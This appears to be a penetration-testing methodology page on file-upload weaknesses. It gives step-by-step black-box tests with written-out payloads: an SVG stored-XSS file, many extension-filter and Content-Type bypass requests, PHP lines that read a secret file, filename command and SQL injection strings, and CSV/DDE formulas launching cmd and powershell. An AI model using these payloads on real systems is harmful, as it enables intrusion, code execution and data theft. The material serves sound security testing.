search

Upload of Unexpected File Types

hashtag
Check List

hashtag
Methodology

hashtag
Black Box

hashtag
Stored Cross-Site Scripting (Stored XSS) via SVG Uploadarrow-up-right

1

Login to Account

2

Access your account with valid credentials

3

Open Your Project

4

Navigate to the specific project you want to test

5

Go to the locate the avatar upload form

6

Attach PNG File with SVG Code and Upload a PNG file containing the SVG code

<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> </svg>
7

Click forward the request and after creating the image, open it and Check if an alert dialog appears; if not, click the triangle again to confirm

hashtag
File Extension Filter Bypassarrow-up-right

1

Check what are file extensions allowed in the web app. This depends on the type of backend server

.php ,.html, .jsp, .svg, .asp, .aspx ,pHp, pHP5, PhAr, hTmL, etc ,.pht ,.phps ,.phar ,.phpt ,.pgif ,.phtml ,.phtm ,.inc

2

hashtag
Double-Extension Upload Bypass

Try adding a valid extension before the execution extension exploit.png.php or exploit.php.png

3

hashtag
Trailing-Extension Upload Bypass

Check adding a valid extension at the end exploit.php/.jpg ( app may save this as a .php file but recognizes as .jpg)

4

hashtag
Encoding Bypass

Try encoding exploit.php%0d%0a.jpg or exploit.jpg%0d%0a.php

5

hashtag
Null Byte Injection Bypass

Upload a file with a null byte injection exploit.php%00.jpg or exploit.jpg%00.php

6

hashtag
Semicolon Extension bypass

Add semicolons before the file extension exploit.asp;.jpg

7

hashtag
Multibyte Unicode Filename Normalization Bypass

Try using multibyte unicode characters, which may be converted to null bytes and dots after unicode conversion or normalization Sequences like xC0 x2E, xC4 xAE or xC0 xAE may be translated to x2E if the filename parsed as a UTF-8 string, but then converted to ASCII characters before being used in a path

8

hashtag
Overlapping-Extension Bypass

Try positioning the prohibited string in such a way that removing it still leaves behind a valid file extension. For example, consider what happens if you strip .php from the following filename exploit.p.phphp

9

hashtag
Filename-Based XSS

Try to put the XSS payload in the name of the filetest.jpg,test.jpg

10

hashtag
Filename-Based Command Injection

Command Injection in the filename e.g. ; sleep 10;

11

hashtag
Content-Type Spoofing

Try to use extension as .html and change Content-Type to html/text

------WebKitFormBoundary6IrxqgTfmnW0FkOZ
Content-Disposition: form-data; name="uploadimage"; 
filename="exploit.html"
Content-Type: html/text
12

hashtag
Missing Content-Type Upload Bypass

Try to send the request with no Content-Type

------WebKitFormBoundary6IrxqgTfmnW0FkOZ
Content-Disposition: form-data; name="uploadimage"; 
filename="exploit.html"


<code here>
13

hashtag
Content-Type Spoofing

Try to use extension as .jpg/png ( if app expects image only) but change Content-Type to text/html

------WebKitFormBoundary6IrxqgTfmnW0FkOZ
Content-Disposition: form-data; name="uploadimage"; 
filename="exploit.jpg"
Content-Type: text/html
14

hashtag
Extensionless Upload + Content-Type Spoofing

Try leaving extension blank and Content-Type text/html

------WebKitFormBoundary6IrxqgTfmnW0FkOZ
Content-Disposition: form-data; name="uploadimage"; 
filename="file."
Content-Type: text/html
15

hashtag
Extension-Only Upload + Content-Type Spoofing

Try using the extension only 

------WebKitFormBoundary6IrxqgTfmnW0FkOZ
Content-Disposition: form-data; name="uploadimage"; 
filename=".html"
Content-Type: image/png
16

hashtag
Filename Special-Characters Bypass

Try to use especial characters in the names

------WebKitFormBoundary6IrxqgTfmnW0FkOZ
Content-Disposition: form-data; name="uploadimage";
filename="exploit.jpg#/?&=+.html"
Content-Type: image/jpeg
17

hashtag
File Upload Manipulation

Try changing Content-Type When uploading, Content Type could be: Content-Type: application/octet-stream or Content-Type: application/x-php try replacing it withimage/jpeg/,image/jpg, image.png, image/gif

------WebKitFormBoundary6IrxqgTfmnW0FkOZ
Content-Disposition: form-data; name="avatar"; filename="exploit.php"
Content-Type: application/octet-stream

<?php echo file_get_contents('/home/carlos/secret'); ?>
18

hashtag
Unicode Bypass

Try to use Unicode

Content-Disposition: form-data; name="uploadimage"; 
filename="exploit.jpg%u0025%u0030%u0039.php"
Content-Type: application/php

<?php echo file_get_contents('/home/carlos/secret'); ?>
19

hashtag
Time-Based SQLi Payloads

poc.js'(select*from(select(sleep(20)))a)+'.extension

hashtag
CSV Injection

1

Register an account and explore all features that allow sending data that will later be visible/exported by an admin or another user

2

Look specifically for contact forms, feedback forms, support tickets, guestbook, comments, or any “send message to admin” functionality

3

Submit a normal message and confirm that the admin can view and export these messages as CSV/Excel

4

Craft and send the following classic CSV injection payloads in any text field that will appear in the exported file (name, message, email, subject, etc.)

=DDE("cmd";"/C calc";"!A0")A0
=2+5
=cmd|'/C calc'!A0
=cmd|'/C powershell'!A0
=4+4
=1+1+1+1+1
@SUM(1+1)*cmd|'/C calc'!A0
5

Wait or ask the admin in real scenario the victim opens the file to export/download the messages as CSV

6

When the exported CSV file is opened in Microsoft Excel, LibreOffice Calc, Google Sheets (when imported or any spreadsheet software

hashtag
White Box

hashtag
Cheat Sheet

PreviousDefenses Against Application MisuseNextUpload of Malicious Files

Last updated